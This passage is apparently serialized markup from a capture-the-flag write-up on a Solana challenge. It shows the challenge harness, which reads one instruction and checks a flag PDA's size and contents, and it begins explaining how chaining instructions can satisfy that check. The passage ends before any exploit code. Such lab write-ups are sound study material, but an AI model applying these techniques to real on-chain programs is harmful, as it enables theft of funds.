572,"children":44573},{"style":5601},[44574],{"type":32,"value":6267},{"type":26,"tag":137,"props":44576,"children":44577},{"class":5559,"line":5412},[44578,44583,44587,44592,44596,44601,44605,44610,44614,44619,44624,44628,44633,44637,44642,44646],{"type":26,"tag":137,"props":44579,"children":44580},{"style":5682},[44581],{"type":32,"value":44582},"assert!",{"type":26,"tag":137,"props":44584,"children":44585},{"style":5601},[44586],{"type":32,"value":165},{"type":26,"tag":137,"props":44588,"children":44589},{"style":5584},[44590],{"type":32,"value":44591},"builder",{"type":26,"tag":137,"props":44593,"children":44594},{"style":5590},[44595],{"type":32,"value":470},{"type":26,"tag":137,"props":44597,"children":44598},{"style":5682},[44599],{"type":32,"value":44600},"add_program",{"type":26,"tag":137,"props":44602,"children":44603},{"style":5601},[44604],{"type":32,"value":165},{"type":26,"tag":137,"props":44606,"children":44607},{"style":6837},[44608],{"type":32,"value":44609},"\"/path/to/chall.so\"",{"type":26,"tag":137,"props":44611,"children":44612},{"style":5601},[44613],{"type":32,"value":1108},{"type":26,"tag":137,"props":44615,"children":44616},{"style":6009},[44617],{"type":32,"value":44618},"Some",{"type":26,"tag":137,"props":44620,"children":44621},{"style":5601},[44622],{"type":32,"value":44623},"(chall",{"type":26,"tag":137,"props":44625,"children":44626},{"style":5590},[44627],{"type":32,"value":6072},{"type":26,"tag":137,"props":44629,"children":44630},{"style":5601},[44631],{"type":32,"value":44632},"ID)) ",{"type":26,"tag":137,"props":44634,"children":44635},{"style":5590},[44636],{"type":32,"value":11161},{"type":26,"tag":137,"props":44638,"children":44639},{"style":5601},[44640],{"type":32,"value":44641}," chall",{"type":26,"tag":137,"props":44643,"children":44644},{"style":5590},[44645],{"type":32,"value":6072},{"type":26,"tag":137,"props":44647,"children":44648},{"style":5601},[44649],{"type":32,"value":44650},"ID);\n",{"type":26,"tag":137,"props":44652,"children":44653},{"class":5559,"line":5417},[44654,44658,44662,44666,44670,44674,44678,44683,44687,44691,44695],{"type":26,"tag":137,"props":44655,"children":44656},{"style":5573},[44657],{"type":32,"value":14378},{"type":26,"tag":137,"props":44659,"children":44660},{"style":5573},[44661],{"type":32,"value":5581},{"type":26,"tag":137,"props":44663,"children":44664},{"style":5584},[44665],{"type":32,"value":44641},{"type":26,"tag":137,"props":44667,"children":44668},{"style":5590},[44669],{"type":32,"value":5593},{"type":26,"tag":137,"props":44671,"children":44672},{"style":5584},[44673],{"type":32,"value":44509},{"type":26,"tag":137,"props":44675,"children":44676},{"style":5590},[44677],{"type":32,"value":470},{"type":26,"tag":137,"props":44679,"children":44680},{"style":5682},[44681],{"type":32,"value":44682},"build",{"type":26,"tag":137,"props":44684,"children":44685},{"style":5601},[44686],{"type":32,"value":16470},{"type":26,"tag":137,"props":44688,"children":44689},{"style":5590},[44690],{"type":32,"value":470},{"type":26,"tag":137,"props":44692,"children":44693},{"style":5610},[44694],{"type":32,"value":35512},{"type":26,"tag":137,"props":44696,"children":44697},{"style":5601},[44698],{"type":32,"value":5604},{"type":26,"tag":4820,"props":44700,"children":44701},{"start":5412},[44702],{"type":26,"tag":3430,"props":44703,"children":44704},{},[44705],{"type":32,"value":44706},"Funds the user account with 100 SOL",{"type":26,"tag":5512,"props":44708,"children":44710},{"className":5552,"code":44709,"language":5551,"meta":7,"style":7},"let user_keypair = Keypair::new();\nlet user = user_keypair.pubkey();\n\nlet payer_keypair = &chall.ctx.payer;\nlet payer = payer_keypair.pubkey();\n\nchall\n    .run_ix(system_instruction::transfer(&payer, &user, 100_000_000_000))\n    .await?;\n\nwriteln!(socket, \"user: {}\", user)?;\n",[44711],{"type":26,"tag":130,"props":44712,"children":44713},{"__ignoreMap":7},[44714,44747,44779,44786,44828,44860,44867,44875,44939,44958,44965],{"type":26,"tag":137,"props":44715,"children":44716},{"class":5559,"line":5560},[44717,44721,44726,44730,44735,44739,44743],{"type":26,"tag":137,"props":44718,"children":44719},{"style":5573},[44720],{"type":32,"value":14378},{"type":26,"tag":137,"props":44722,"children":44723},{"style":5584},[44724],{"type":32,"value":44725}," user_keypair",{"type":26,"tag":137,"props":44727,"children":44728},{"style":5590},[44729],{"type":32,"value":5593},{"type":26,"tag":137,"props":44731,"children":44732},{"style":6009},[44733],{"type":32,"value":44734}," Keypair",{"type":26,"tag":137,"props":44736,"children":44737},{"style":5590},[44738],{"type":32,"value":6072},{"type":26,"tag":137,"props":44740,"children":44741},{"style":5682},[44742],{"type":32,"value":17714},{"type":26,"tag":137,"props":44744,"children":44745},{"style":5601},[44746],{"type":32,"value":6267},{"type":26,"tag":137,"props":44748,"children":44749},{"class":5559,"line":5412},[44750,44754,44759,44763,44767,44771,44775],{"type":26,"tag":137,"props":44751,"children":44752},{"style":5573},[44753],{"type":32,"value":14378},{"type":26,"tag":137,"props":44755,"children":44756},{"style":5584},[44757],{"type":32,"value":44758}," user",{"type":26,"tag":137,"props":44760,"children":44761},{"style":5590},[44762],{"type":32,"value":5593},{"type":26,"tag":137,"props":44764,"children":44765},{"style":5584},[44766],{"type":32,"value":44725},{"type":26,"tag":137,"props":44768,"children":44769},{"style":5590},[44770],{"type":32,"value":470},{"type":26,"tag":137,"props":44772,"children":44773},{"style":5682},[44774],{"type":32,"value":6136},{"type":26,"tag":137,"props":44776,"children":44777},{"style":5601},[44778],{"type":32,"value":6267},{"type":26,"tag":137,"props":44780,"children":44781},{"class":5559,"line":5417},[44782],{"type":26,"tag":137,"props":44783,"children":44784},{"emptyLinePlaceholder":18},[44785],{"type":32,"value":6276},{"type":26,"tag":137,"props":44787,"children":44788},{"class":5559,"line":5642},[44789,44793,44798,44802,44806,44811,44815,44819,44823],{"type":26,"tag":137,"props":44790,"children":44791},{"style":5573},[44792],{"type":32,"value":14378},{"type":26,"tag":137,"props":44794,"children":44795},{"style":5584},[44796],{"type":32,"value":44797}," payer_keypair",{"type":26,"tag":137,"props":44799,"children":44800},{"style":5590},[44801],{"type":32,"value":5593},{"type":26,"tag":137,"props":44803,"children":44804},{"style":5590},[44805],{"type":32,"value":9725},{"type":26,"tag":137,"props":44807,"children":44808},{"style":5584},[44809],{"type":32,"value":44810},"chall",{"type":26,"tag":137,"props":44812,"children":44813},{"style":5590},[44814],{"type":32,"value":470},{"type":26,"tag":137,"props":44816,"children":44817},{"style":5601},[44818],{"type":32,"value":22874},{"type":26,"tag":137,"props":44820,"children":44821},{"style":5590},[44822],{"type":32,"value":470},{"type":26,"tag":137,"props":44824,"children":44825},{"style":5601},[44826],{"type":32,"value":44827},"payer;\n",{"type":26,"tag":137,"props":44829,"children":44830},{"class":5559,"line":5745},[44831,44835,44840,44844,44848,44852,44856],{"type":26,"tag":137,"props":44832,"children":44833},{"style":5573},[44834],{"type":32,"value":14378},{"type":26,"tag":137,"props":44836,"children":44837},{"style":5584},[44838],{"type":32,"value":44839}," payer",{"type":26,"tag":137,"props":44841,"children":44842},{"style":5590},[44843],{"type":32,"value":5593},{"type":26,"tag":137,"props":44845,"children":44846},{"style":5584},[44847],{"type":32,"value":44797},{"type":26,"tag":137,"props":44849,"children":44850},{"style":5590},[44851],{"type":32,"value":470},{"type":26,"tag":137,"props":44853,"children":44854},{"style":5682},[44855],{"type":32,"value":6136},{"type":26,"tag":137,"props":44857,"children":44858},{"style":5601},[44859],{"type":32,"value":6267},{"type":26,"tag":137,"props":44861,"children":44862},{"class":5559,"line":5850},[44863],{"type":26,"tag":137,"props":44864,"children":44865},{"emptyLinePlaceholder":18},[44866],{"type":32,"value":6276},{"type":26,"tag":137,"props":44868,"children":44869},{"class":5559,"line":5878},[44870],{"type":26,"tag":137,"props":44871,"children":44872},{"style":5584},[44873],{"type":32,"value":44874},"chall\n",{"type":26,"tag":137,"props":44876,"children":44877},{"class":5559,"line":5891},[44878,44883,44888,44893,44897,44901,44905,44909,44914,44918,44922,44926,44930,44935],{"type":26,"tag":137,"props":44879,"children":44880},{"style":5590},[44881],{"type":32,"value":44882},"    .",{"type":26,"tag":137,"props":44884,"children":44885},{"style":5682},[44886],{"type":32,"value":44887},"run_ix",{"type":26,"tag":137,"props":44889,"children":44890},{"style":5601},[44891],{"type":32,"value":44892},"(system_instruction",{"type":26,"tag":137,"props":44894,"children":44895},{"style":5590},[44896],{"type":32,"value":6072},{"type":26,"tag":137,"props":44898,"children":44899},{"style":5682},[44900],{"type":32,"value":34718},{"type":26,"tag":137,"props":44902,"children":44903},{"style":5601},[44904],{"type":32,"value":165},{"type":26,"tag":137,"props":44906,"children":44907},{"style":5590},[44908],{"type":32,"value":5694},{"type":26,"tag":137,"props":44910,"children":44911},{"style":5584},[44912],{"type":32,"value":44913},"payer",{"type":26,"tag":137,"props":44915,"children":44916},{"style":5601},[44917],{"type":32,"value":1108},{"type":26,"tag":137,"props":44919,"children":44920},{"style":5590},[44921],{"type":32,"value":5694},{"type":26,"tag":137,"props":44923,"children":44924},{"style":5584},[44925],{"type":32,"value":22826},{"type":26,"tag":137,"props":44927,"children":44928},{"style":5601},[44929],{"type":32,"value":1108},{"type":26,"tag":137,"props":44931,"children":44932},{"style":5626},[44933],{"type":32,"value":44934},"100_000_000_000",{"type":26,"tag":137,"props":44936,"children":44937},{"style":5601},[44938],{"type":32,"value":22305},{"type":26,"tag":137,"props":44940,"children":44941},{"class":5559,"line":5909},[44942,44946,44950,44954],{"type":26,"tag":137,"props":44943,"children":44944},{"style":5590},[44945],{"type":32,"value":44882},{"type":26,"tag":137,"props":44947,"children":44948},{"style":5610},[44949],{"type":32,"value":35512},{"type":26,"tag":137,"props":44951,"children":44952},{"style":5590},[44953],{"type":32,"value":5737},{"type":26,"tag":137,"props":44955,"children":44956},{"style":5601},[44957],{"type":32,"value":5604},{"type":26,"tag":137,"props":44959,"children":44960},{"class":5559,"line":5930},[44961],{"type":26,"tag":137,"props":44962,"children":44963},{"emptyLinePlaceholder":18},[44964],{"type":32,"value":6276},{"type":26,"tag":137,"props":44966,"children":44967},{"class":5559,"line":5939},[44968,44973,44977,44981,44985,44990,44994,44998,45002,45006],{"type":26,"tag":137,"props":44969,"children":44970},{"style":5682},[44971],{"type":32,"value":44972},"writeln!",{"type":26,"tag":137,"props":44974,"children":44975},{"style":5601},[44976],{"type":32,"value":165},{"type":26,"tag":137,"props":44978,"children":44979},{"style":5584},[44980],{"type":32,"value":44536},{"type":26,"tag":137,"props":44982,"children":44983},{"style":5601},[44984],{"type":32,"value":1108},{"type":26,"tag":137,"props":44986,"children":44987},{"style":6837},[44988],{"type":32,"value":44989},"\"user: {}\"",{"type":26,"tag":137,"props":44991,"children":44992},{"style":5601},[44993],{"type":32,"value":1108},{"type":26,"tag":137,"props":44995,"children":44996},{"style":5584},[44997],{"type":32,"value":22826},{"type":26,"tag":137,"props":44999,"children":45000},{"style":5601},[45001],{"type":32,"value":200},{"type":26,"tag":137,"props":45003,"children":45004},{"style":5590},[45005],{"type":32,"value":5737},{"type":26,"tag":137,"props":45007,"children":45008},{"style":5601},[45009],{"type":32,"value":5604},{"type":26,"tag":4820,"props":45011,"children":45012},{"start":5417},[45013],{"type":26,"tag":3430,"props":45014,"children":45015},{},[45016],{"type":32,"value":45017},"Reads an instruction from the tcp stream and executes it",{"type":26,"tag":5512,"props":45019,"children":45021},{"className":5552,"code":45020,"language":5551,"meta":7,"style":7},"let solve_ix = chall.read_instruction(chall::ID)?;\nchall.run_ixs_full(&[solve_ix], &[&user_keypair], &user).await?;\n",[45022],{"type":26,"tag":130,"props":45023,"children":45024},{"__ignoreMap":7},[45025,45075],{"type":26,"tag":137,"props":45026,"children":45027},{"class":5559,"line":5560},[45028,45032,45037,45041,45045,45049,45054,45058,45062,45067,45071],{"type":26,"tag":137,"props":45029,"children":45030},{"style":5573},[45031],{"type":32,"value":14378},{"type":26,"tag":137,"props":45033,"children":45034},{"style":5584},[45035],{"type":32,"value":45036}," solve_ix",{"type":26,"tag":137,"props":45038,"children":45039},{"style":5590},[45040],{"type":32,"value":5593},{"type":26,"tag":137,"props":45042,"children":45043},{"style":5584},[45044],{"type":32,"value":44641},{"type":26,"tag":137,"props":45046,"children":45047},{"style":5590},[45048],{"type":32,"value":470},{"type":26,"tag":137,"props":45050,"children":45051},{"style":5682},[45052],{"type":32,"value":45053},"read_instruction",{"type":26,"tag":137,"props":45055,"children":45056},{"style":5601},[45057],{"type":32,"value":44623},{"type":26,"tag":137,"props":45059,"children":45060},{"style":5590},[45061],{"type":32,"value":6072},{"type":26,"tag":137,"props":45063,"children":45064},{"style":5601},[45065],{"type":32,"value":45066},"ID)",{"type":26,"tag":137,"props":45068,"children":45069},{"style":5590},[45070],{"type":32,"value":5737},{"type":26,"tag":137,"props":45072,"children":45073},{"style":5601},[45074],{"type":32,"value":5604},{"type":26,"tag":137,"props":45076,"children":45077},{"class":5559,"line":5412},[45078,45082,45086,45091,45095,45099,45103,45108,45112,45116,45120,45124,45129,45133,45137,45141,45145,45149,45153,45157],{"type":26,"tag":137,"props":45079,"children":45080},{"style":5584},[45081],{"type":32,"value":44810},{"type":26,"tag":137,"props":45083,"children":45084},{"style":5590},[45085],{"type":32,"value":470},{"type":26,"tag":137,"props":45087,"children":45088},{"style":5682},[45089],{"type":32,"value":45090},"run_ixs_full",{"type":26,"tag":137,"props":45092,"children":45093},{"style":5601},[45094],{"type":32,"value":165},{"type":26,"tag":137,"props":45096,"children":45097},{"style":5590},[45098],{"type":32,"value":5694},{"type":26,"tag":137,"props":45100,"children":45101},{"style":5601},[45102],{"type":32,"value":3016},{"type":26,"tag":137,"props":45104,"children":45105},{"style":5584},[45106],{"type":32,"value":45107},"solve_ix",{"type":26,"tag":137,"props":45109,"children":45110},{"style":5601},[45111],{"type":32,"value":25640},{"type":26,"tag":137,"props":45113,"children":45114},{"style":5590},[45115],{"type":32,"value":5694},{"type":26,"tag":137,"props":45117,"children":45118},{"style":5601},[45119],{"type":32,"value":3016},{"type":26,"tag":137,"props":45121,"children":45122},{"style":5590},[45123],{"type":32,"value":5694},{"type":26,"tag":137,"props":45125,"children":45126},{"style":5584},[45127],{"type":32,"value":45128},"user_keypair",{"type":26,"tag":137,"props":45130,"children":45131},{"style":5601},[45132],{"type":32,"value":25640},{"type":26,"tag":137,"props":45134,"children":45135},{"style":5590},[45136],{"type":32,"value":5694},{"type":26,"tag":137,"props":45138,"children":45139},{"style":5584},[45140],{"type":32,"value":22826},{"type":26,"tag":137,"props":45142,"children":45143},{"style":5601},[45144],{"type":32,"value":200},{"type":26,"tag":137,"props":45146,"children":45147},{"style":5590},[45148],{"type":32,"value":470},{"type":26,"tag":137,"props":45150,"children":45151},{"style":5610},[45152],{"type":32,"value":35512},{"type":26,"tag":137,"props":45154,"children":45155},{"style":5590},[45156],{"type":32,"value":5737},{"type":26,"tag":137,"props":45158,"children":45159},{"style":5601},[45160],{"type":32,"value":5604},{"type":26,"tag":4820,"props":45162,"children":45163},{"start":5642},[45164],{"type":26,"tag":3430,"props":45165,"children":45166},{},[45167],{"type":32,"value":45168},"Checks that the account at PDA(\"FLAG\") exists, has a data length of 0x1337 and the first 8 bytes are equal to 0x4337. If so, it prints the flag.",{"type":26,"tag":5512,"props":45170,"children":45172},{"className":5552,"code":45171,"language":5551,"meta":7,"style":7},"let flag = Pubkey::create_program_address(&[\"FLAG\".as_ref()], &chall::ID)?;\nif let Some(acct) = chall.ctx.banks_client.get_account(flag).await? {\n    if acct.data.len() == 0x1337\n        && u64::from_le_bytes(acct.data[..8].try_into().unwrap()) == 0x4337\n    {\n        writeln!(socket, \"congrats!\")?;\n        if let Ok(flag) = env::var(\"FLAG\") {\n            writeln!(socket, \"flag: {:?}\", flag)?;\n        } else {\n            writeln!(socket, \"flag not found, please contact admin\")?;\n        }\n    }\n}\n",[45173],{"type":26,"tag":130,"props":45174,"children":45175},{"__ignoreMap":7},[45176,45260,45351,45392,45476,45483,45520,45577,45622,45637,45673,45680,45687],{"type":26,"tag":137,"props":45177,"children":45178},{"class":5559,"line":5560},[45179,45183,45188,45192,45196,45200,45205,45209,45213,45217,45222,45226,45231,45236,45240,45244,45248,45252,45256],{"type":26,"tag":137,"props":45180,"children":45181},{"style":5573},[45182],{"type":32,"value":14378},{"type":26,"tag":137,"props":45184,"children":45185},{"style":5584},[45186],{"type":32,"value":45187}," flag",{"type":26,"tag":137,"props":45189,"children":45190},{"style":5590},[45191],{"type":32,"value":5593},{"type":26,"tag":137,"props":45193,"children":45194},{"style":6009},[45195],{"type":32,"value":23450},{"type":26,"tag":137,"props":45197,"children":45198},{"style":5590},[45199],{"type":32,"value":6072},{"type":26,"tag":137,"props":45201,"children":45202},{"style":5682},[45203],{"type":32,"value":45204},"create_program_address",{"type":26,"tag":137,"props":45206,"children":45207},{"style":5601},[45208],{"type":32,"value":165},{"type":26,"tag":137,"props":45210,"children":45211},{"style":5590},[45212],{"type":32,"value":5694},{"type":26,"tag":137,"props":45214,"children":45215},{"style":5601},[45216],{"type":32,"value":3016},{"type":26,"tag":137,"props":45218,"children":45219},{"style":6837},[45220],{"type":32,"value":45221},"\"FLAG\"",{"type":26,"tag":137,"props":45223,"children":45224},{"style":5590},[45225],{"type":32,"value":470},{"type":26,"tag":137,"props":45227,"children":45228},{"style":5682},[45229],{"type":32,"value":45230},"as_ref",{"type":26,"tag":137,"props":45232,"children":45233},{"style":5601},[45234],{"type":32,"value":45235},"()], ",{"type":26,"tag":137,"props":45237,"children":45238},{"style":5590},[45239],{"type":32,"value":5694},{"type":26,"tag":137,"props":45241,"children":45242},{"style":5601},[45243],{"type":32,"value":44810},{"type":26,"tag":137,"props":45245,"children":45246},{"style":5590},[45247],{"type":32,"value":6072},{"type":26,"tag":137,"props":45249,"children":45250},{"style":5601},[45251],{"type":32,"value":45066},{"type":26,"tag":137,"props":45253,"children":45254},{"style":5590},[45255],{"type":32,"value":5737},{"type":26,"tag":137,"props":45257,"children":45258},{"style":5601},[45259],{"type":32,"value":5604},{"type":26,"tag":137,"props":45261,"children":45262},{"class":5559,"line":5412},[45263,45267,45271,45275,45279,45284,45288,45292,45296,45300,45304,45308,45313,45317,45322,45326,45331,45335,45339,45343,45347],{"type":26,"tag":137,"props":45264,"children":45265},{"style":5610},[45266],{"type":32,"value":18171},{"type":26,"tag":137,"props":45268,"children":45269},{"style":5573},[45270],{"type":32,"value":29897},{"type":26,"tag":137,"props":45272,"children":45273},{"style":6009},[45274],{"type":32,"value":29902},{"type":26,"tag":137,"props":45276,"children":45277},{"style":5601},[45278],{"type":32,"value":165},{"type":26,"tag":137,"props":45280,"children":45281},{"style":5584},[45282],{"type":32,"value":45283},"acct",{"type":26,"tag":137,"props":45285,"children":45286},{"style":5601},[45287],{"type":32,"value":5671},{"type":26,"tag":137,"props":45289,"children":45290},{"style":5590},[45291],{"type":32,"value":289},{"type":26,"tag":137,"props":45293,"children":45294},{"style":5584},[45295],{"type":32,"value":44641},{"type":26,"tag":137,"props":45297,"children":45298},{"style":5590},[45299],{"type":32,"value":470},{"type":26,"tag":137,"props":45301,"children":45302},{"style":5601},[45303],{"type":32,"value":22874},{"type":26,"tag":137,"props":45305,"children":45306},{"style":5590},[45307],{"type":32,"value":470},{"type":26,"tag":137,"props":45309,"children":45310},{"style":5601},[45311],{"type":32,"value":45312},"banks_client",{"type":26,"tag":137,"props":45314,"children":45315},{"style":5590},[45316],{"type":32,"value":470},{"type":26,"tag":137,"props":45318,"children":45319},{"style":5682},[45320],{"type":32,"value":45321},"get_account",{"type":26,"tag":137,"props":45323,"children":45324},{"style":5601},[45325],{"type":32,"value":165},{"type":26,"tag":137,"props":45327,"children":45328},{"style":5584},[45329],{"type":32,"value":45330},"flag",{"type":26,"tag":137,"props":45332,"children":45333},{"style":5601},[45334],{"type":32,"value":200},{"type":26,"tag":137,"props":45336,"children":45337},{"style":5590},[45338],{"type":32,"value":470},{"type":26,"tag":137,"props":45340,"children":45341},{"style":5610},[45342],{"type":32,"value":35512},{"type":26,"tag":137,"props":45344,"children":45345},{"style":5590},[45346],{"type":32,"value":5737},{"type":26,"tag":137,"props":45348,"children":45349},{"style":5601},[45350],{"type":32,"value":5875},{"type":26,"tag":137,"props":45352,"children":45353},{"class":5559,"line":5417},[45354,45358,45363,45367,45371,45375,45379,45383,45387],{"type":26,"tag":137,"props":45355,"children":45356},{"style":5610},[45357],{"type":32,"value":14870},{"type":26,"tag":137,"props":45359,"children":45360},{"style":5584},[45361],{"type":32,"value":45362}," acct",{"type":26,"tag":137,"props":45364,"children":45365},{"style":5590},[45366],{"type":32,"value":470},{"type":26,"tag":137,"props":45368,"children":45369},{"style":5601},[45370],{"type":32,"value":6303},{"type":26,"tag":137,"props":45372,"children":45373},{"style":5590},[45374],{"type":32,"value":470},{"type":26,"tag":137,"props":45376,"children":45377},{"style":5682},[45378],{"type":32,"value":11727},{"type":26,"tag":137,"props":45380,"children":45381},{"style":5601},[45382],{"type":32,"value":16634},{"type":26,"tag":137,"props":45384,"children":45385},{"style":5590},[45386],{"type":32,"value":11161},{"type":26,"tag":137,"props":45388,"children":45389},{"style":5626},[45390],{"type":32,"value":45391}," 0x1337\n",{"type":26,"tag":137,"props":45393,"children":45394},{"class":5559,"line":5642},[45395,45400,45404,45408,45413,45417,45421,45425,45430,45434,45438,45442,45446,45450,45454,45458,45462,45467,45471],{"type":26,"tag":137,"props":45396,"children":45397},{"style":5590},[45398],{"type":32,"value":45399},"        &&",{"type":26,"tag":137,"props":45401,"children":45402},{"style":6009},[45403],{"type":32,"value":8445},{"type":26,"tag":137,"props":45405,"children":45406},{"style":5590},[45407],{"type":32,"value":6072},{"type":26,"tag":137,"props":45409,"children":45410},{"style":5682},[45411],{"type":32,"value":45412},"from_le_bytes",{"type":26,"tag":137,"props":45414,"children":45415},{"style":5601},[45416],{"type":32,"value":165},{"type":26,"tag":137,"props":45418,"children":45419},{"style":5584},[45420],{"type":32,"value":45283},{"type":26,"tag":137,"props":45422,"children":45423},{"style":5590},[45424],{"type":32,"value":470},{"type":26,"tag":137,"props":45426,"children":45427},{"style":5601},[45428],{"type":32,"value":45429},"data[",{"type":26,"tag":137,"props":45431,"children":45432},{"style":5590},[45433],{"type":32,"value":5634},{"type":26,"tag":137,"props":45435,"children":45436},{"style":5626},[45437],{"type":32,"value":6663},{"type":26,"tag":137,"props":45439,"children":45440},{"style":5601},[45441],{"type":32,"value":3079},{"type":26,"tag":137,"props":45443,"children":45444},{"style":5590},[45445],{"type":32,"value":470},{"type":26,"tag":137,"props":45447,"children":45448},{"style":5682},[45449],{"type":32,"value":28754},{"type":26,"tag":137,"props":45451,"children":45452},{"style":5601},[45453],{"type":32,"value":16470},{"type":26,"tag":137,"props":45455,"children":45456},{"style":5590},[45457],{"type":32,"value":470},{"type":26,"tag":137,"props":45459,"children":45460},{"style":5682},[45461],{"type":32,"value":6262},{"type":26,"tag":137,"props":45463,"children":45464},{"style":5601},[45465],{"type":32,"value":45466},"()) ",{"type":26,"tag":137,"props":45468,"children":45469},{"style":5590},[45470],{"type":32,"value":11161},{"type":26,"tag":137,"props":45472,"children":45473},{"style":5626},[45474],{"type":32,"value":45475}," 0x4337\n",{"type":26,"tag":137,"props":45477,"children":45478},{"class":5559,"line":5745},[45479],{"type":26,"tag":137,"props":45480,"children":45481},{"style":5601},[45482],{"type":32,"value":31781},{"type":26,"tag":137,"props":45484,"children":45485},{"class":5559,"line":5850},[45486,45491,45495,45499,45503,45508,45512,45516],{"type":26,"tag":137,"props":45487,"children":45488},{"style":5682},[45489],{"type":32,"value":45490},"        writeln!",{"type":26,"tag":137,"props":45492,"children":45493},{"style":5601},[45494],{"type":32,"value":165},{"type":26,"tag":137,"props":45496,"children":45497},{"style":5584},[45498],{"type":32,"value":44536},{"type":26,"tag":137,"props":45500,"children":45501},{"style":5601},[45502],{"type":32,"value":1108},{"type":26,"tag":137,"props":45504,"children":45505},{"style":6837},[45506],{"type":32,"value":45507},"\"congrats!\"",{"type":26,"tag":137,"props":45509,"children":45510},{"style":5601},[45511],{"type":32,"value":200},{"type":26,"tag":137,"props":45513,"children":45514},{"style":5590},[45515],{"type":32,"value":5737},{"type":26,"tag":137,"props":45517,"children":45518},{"style":5601},[45519],{"type":32,"value":5604},{"type":26,"tag":137,"props":45521,"children":45522},{"class":5559,"line":5878},[45523,45527,45531,45536,45540,45544,45548,45552,45557,45561,45565,45569,45573],{"type":26,"tag":137,"props":45524,"children":45525},{"style":5610},[45526],{"type":32,"value":5856},{"type":26,"tag":137,"props":45528,"children":45529},{"style":5573},[45530],{"type":32,"value":29897},{"type":26,"tag":137,"props":45532,"children":45533},{"style":6009},[45534],{"type":32,"value":45535}," Ok",{"type":26,"tag":137,"props":45537,"children":45538},{"style":5601},[45539],{"type":32,"value":165},{"type":26,"tag":137,"props":45541,"children":45542},{"style":5584},[45543],{"type":32,"value":45330},{"type":26,"tag":137,"props":45545,"children":45546},{"style":5601},[45547],{"type":32,"value":5671},{"type":26,"tag":137,"props":45549,"children":45550},{"style":5590},[45551],{"type":32,"value":289},{"type":26,"tag":137,"props":45553,"children":45554},{"style":5601},[45555],{"type":32,"value":45556}," env",{"type":26,"tag":137,"props":45558,"children":45559},{"style":5590},[45560],{"type":32,"value":6072},{"type":26,"tag":137,"props":45562,"children":45563},{"style":5682},[45564],{"type":32,"value":37643},{"type":26,"tag":137,"props":45566,"children":45567},{"style":5601},[45568],{"type":32,"value":165},{"type":26,"tag":137,"props":45570,"children":45571},{"style":6837},[45572],{"type":32,"value":45221},{"type":26,"tag":137,"props":45574,"children":45575},{"style":5601},[45576],{"type":32,"value":17395},{"type":26,"tag":137,"props":45578,"children":45579},{"class":5559,"line":5891},[45580,45585,45589,45593,45597,45602,45606,45610,45614,45618],{"type":26,"tag":137,"props":45581,"children":45582},{"style":5682},[45583],{"type":32,"value":45584},"            writeln!",{"type":26,"tag":137,"props":45586,"children":45587},{"style":5601},[45588],{"type":32,"value":165},{"type":26,"tag":137,"props":45590,"children":45591},{"style":5584},[45592],{"type":32,"value":44536},{"type":26,"tag":137,"props":45594,"children":45595},{"style":5601},[45596],{"type":32,"value":1108},{"type":26,"tag":137,"props":45598,"children":45599},{"style":6837},[45600],{"type":32,"value":45601},"\"flag: {:?}\"",{"type":26,"tag":137,"props":45603,"children":45604},{"style":5601},[45605],{"type":32,"value":1108},{"type":26,"tag":137,"props":45607,"children":45608},{"style":5584},[45609],{"type":32,"value":45330},{"type":26,"tag":137,"props":45611,"children":45612},{"style":5601},[45613],{"type":32,"value":200},{"type":26,"tag":137,"props":45615,"children":45616},{"style":5590},[45617],{"type":32,"value":5737},{"type":26,"tag":137,"props":45619,"children":45620},{"style":5601},[45621],{"type":32,"value":5604},{"type":26,"tag":137,"props":45623,"children":45624},{"class":5559,"line":5909},[45625,45629,45633],{"type":26,"tag":137,"props":45626,"children":45627},{"style":5601},[45628],{"type":32,"value":5897},{"type":26,"tag":137,"props":45630,"children":45631},{"style":5610},[45632],{"type":32,"value":5902},{"type":26,"tag":137,"props":45634,"children":45635},{"style":5601},[45636],{"type":32,"value":5875},{"type":26,"tag":137,"props":45638,"children":45639},{"class":5559,"line":5930},[45640,45644,45648,45652,45656,45661,45665,45669],{"type":26,"tag":137,"props":45641,"children":45642},{"style":5682},[45643],{"type":32,"value":45584},{"type":26,"tag":137,"props":45645,"children":45646},{"style":5601},[45647],{"type":32,"value":165},{"type":26,"tag":137,"props":45649,"children":45650},{"style":5584},[45651],{"type":32,"value":44536},{"type":26,"tag":137,"props":45653,"children":45654},{"style":5601},[45655],{"type":32,"value":1108},{"type":26,"tag":137,"props":45657,"children":45658},{"style":6837},[45659],{"type":32,"value":45660},"\"flag not found, please contact admin\"",{"type":26,"tag":137,"props":45662,"children":45663},{"style":5601},[45664],{"type":32,"value":200},{"type":26,"tag":137,"props":45666,"children":45667},{"style":5590},[45668],{"type":32,"value":5737},{"type":26,"tag":137,"props":45670,"children":45671},{"style":5601},[45672],{"type":32,"value":5604},{"type":26,"tag":137,"props":45674,"children":45675},{"class":5559,"line":5939},[45676],{"type":26,"tag":137,"props":45677,"children":45678},{"style":5601},[45679],{"type":32,"value":5936},{"type":26,"tag":137,"props":45681,"children":45682},{"class":5559,"line":6191},[45683],{"type":26,"tag":137,"props":45684,"children":45685},{"style":5601},[45686],{"type":32,"value":5945},{"type":26,"tag":137,"props":45688,"children":45689},{"class":5559,"line":6208},[45690],{"type":26,"tag":137,"props":45691,"children":45692},{"style":5601},[45693],{"type":32,"value":6507},{"type":26,"tag":92,"props":45695,"children":45697},{"id":45696},"solution-idea",[45698],{"type":32,"value":45699},"Solution Idea",{"type":26,"tag":35,"props":45701,"children":45702},{},[45703,45705,45710],{"type":32,"value":45704},"You may think it's impossible to do with just one instruction, but we can actually leverage the ",{"type":26,"tag":130,"props":45706,"children":45708},{"className":45707},[],[45709],{"type":32,"value":38277},{"type":32,"value":45711}," function to execute infinite instructions. Well -- not entirely infinite, as we are limited by the amount of data we can pass to the on-chain program, and by the maximum stack depth of the Solana VM -- but we can execute up to 64 instructions, which is more than enough to get the flag.",{"type":26,"tag":35,"props":45713,"children":45714},{},[45715,45717,45723],{"type":32,"value":45716},"In order to get the flag, we need to make sure that the account at ",{"type":26,"tag":130,"props":45718,"children":45720},{"className":45719},[],[45721],{"type":32,"value":45722},"PDA(\"FLAG\")",{"type":32,"value":45724}," exists, has a data length of 0x1337, and the first 8 bytes are equal to 0x4337.",{"type":26,"tag":35,"props":45726,"children":45727},{},[45728,45730,45737],{"type":32,"value":45729},"Essentially, we need to ",{"type":26,"tag":41,"props":45731,"children":45734},{"href":45732,"rel":45733},"https://docs.solana.com/developing/runtime-facilities/programs#system-program",[45],[45735],{"type":32,"value":45736},"invoke the System Program",{"type":32,"value":45738},", and write controlled data into the newly created 